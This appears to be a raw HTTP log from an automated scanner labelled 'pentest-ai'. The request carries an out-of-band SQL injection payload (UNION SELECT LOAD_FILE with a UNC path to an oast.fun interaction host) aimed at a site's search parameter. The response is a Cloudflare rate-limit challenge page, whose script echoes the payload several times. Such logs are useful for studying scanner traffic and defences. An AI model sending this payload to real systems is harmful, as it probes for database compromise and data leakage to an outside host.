REQUEST:
GET https://my.myfirst.tech/search?id=%27%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Ca%27%29%29--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9745
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847409adaa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=77FPOh6K4p97H8UgbOm2H7WXShiCF9VF9QavZCDC6mdWGr35sYmVpahKIq6i7rElYhj7LmirleV61mvQvEAy4qvcP4NZVkmshMalKyItHwHV6ODtvfQ8jtbT814JyzLL3w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847409adaa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'dF9.2TX4AeD2RN8TV2aGz.kxF6o_WciZ9Xp15diWjss-1784281154-1.2.1.1-XhZI5yzpLi7NjEycJOEQLtt328uiEAJGPnKLssp2.UsPs8bIPmh0KFheXIgyk.Pn',cITimeS: '1784281154',cRay: 'a1c847409adaa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?id=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_tk=VO0DywqGb6ZtDXWbl.AeEuATHdpu83F4sJZ2Vl0BXIg-1784281154-1.0.1.1-_PieWA5PZ_Ew4gioH6XRzzcy5NsKrEUxFcYcsluR5kQ",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?id=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_f_tk=VO0DywqGb6ZtDXWbl.AeEuATHdpu83F4sJZ2Vl0BXIg-1784281154-1.0.1.1-_PieWA5PZ_Ew4gioH6XRzzcy5NsKrEUxFcYcsluR5kQ",md: 'j8FrngisdCbmotqzzVgl6H51iCtQF076EdONXuftFEE-1784281154-1.2.1.1-d1yKrYv.1RXxk8EG91gaEXI7nKvwWLXkwa6k0DuzBDqPTTA164K7FQHo2dhXD_GAaXTqLLJ2wOeOcFBd.vRx5U8IyQpd3KT5gMfhOxu2U2y0wJIVmwOzWx.FVm4UJL59mtve6aQx_Rwl3ThM2dvmNw3yUGlIbHV_UKkSxAhSLEK73nuD29razra8Y9xVTUKJil0i8UxeaBCxxvD3XrJ4X1qDGp.6OGGojzRXZsKg7TvauyBTqevHLg0eYgdOEsnd5PFLNvAoRjna9z6ngjQxVjg0pyaf.x7EjCzPEAUF5Szznn.6cL1KzapPXdBrjk7sn0ydtbeA6GtRSscf5oi2MCLoDXH3FSHZgD8U7th8iLxLEsb1VVMzNBByCpCM5aM9_jrb4Tm.yIINBw0B1YJ_sx_pjC1eN9twB5wl84k4OsmJaaGUUH9XG.zG6mnWu0gntigzIKIPO8gYaK.TWjrhWQvQdDF5mIdQCyvYWlDdf.fuzH9Sz9jwDmcIjXgJlbSq3be22f5YLw5sVqn1QBHBuM7t39wtMC_h5iFuQ0wykWLOv5.HP4LJCo66p0iuXgsfV8HKyv03Nr_WfBe8DMG7F1QbWapFmHsBdfJ4VhUqSB7Hultgak9oCLuHMDD49JOWQUCxo9jUicmPvKcvFLZnrBUmbz4suG4svpUfy0YmR2Zu5WqYx40ICu.OyFQU.FWWhM7mUbfCzSufb4M6D0YinvUmapW7T0gIrn4hE8RoPmKngGvlpp4RIj8Eq1Gvh9ElWTgr9KkYZXoB2lAvPfmzfLUNjyFnjotPgJx.5GOy6PnPrd4LemxcI89MIuwLqENzrD8vHqYdW49scCeXIaG0PTi3forqWxP7tirei01fiyYhrwi361tbn5pbek041aATgDygL1LcV05YYev31ndsHatli.PfFNrVb57KO3dQrHORwkn.yOAhcGfWIWEukbVq1Es4zWZn8ywQoO.fb2JoUmTcuzYO8BPYQJXi9ab_ouelO6wJSqH43R06UMv1l45I1g4xsSl9Na5oIDshBkWfN62hzvUor9RwCAdfCj2l7sInf.a3INUgXGjbMhBcqdsIN222KvrZzKDUqhYUBD1RckllK_LZofLSD9ffV.xCGwA5rLcZC2jAinaHVRJUABVd5HpxVanu00HsZKArbPCJKTcMJViKTEHwHVbEs8CKVjbLOxp0cwiNqBMGj8s3qyV3kZ9l43wWgGmNh99wVTqBJBy5y53ioZ5hHaHTtzKxnrtuR8cQXmesJqad8nUr.2cTPIk_AydAO4vB.Kkf5kSjTQ',mdrd: 'OqQKgqMJsImLMmBNt9zoGQamdGGOmNZvjz2uCe2Dv7Y-1784281154-1.2.1.1-DYxG58N1RwvTAdofgEzZeSTeM0oMWZeZ_S5w_ZI1u34lRT3heMw3tOEE4q_5BahMm9lPOI44pHW.08aGfdiCNFA81J6KgkMRgpirMInmjwFVikRZUMIH550BLCyYUCZKJB_jKyms1HbouvXgGERssIh6Pb5a9xTgBFs4_SVjW4T0wMpYnZgospJyUaAERMyi8yfzqaOSnXnFS6en1TYx3_tDtKuDxFtJEmR6oZ7McVYwuIoTtc07N.4t8yoL5ncj',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847409adaa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?id=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_rt_tk=VO0DywqGb6ZtDXWbl.AeEuATHdpu83F4sJZ2Vl0BXIg-1784281154-1.0.1.1-_PieWA5PZ_Ew4gioH6XRzzcy5NsKrEUxFcYcsluR5kQ"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
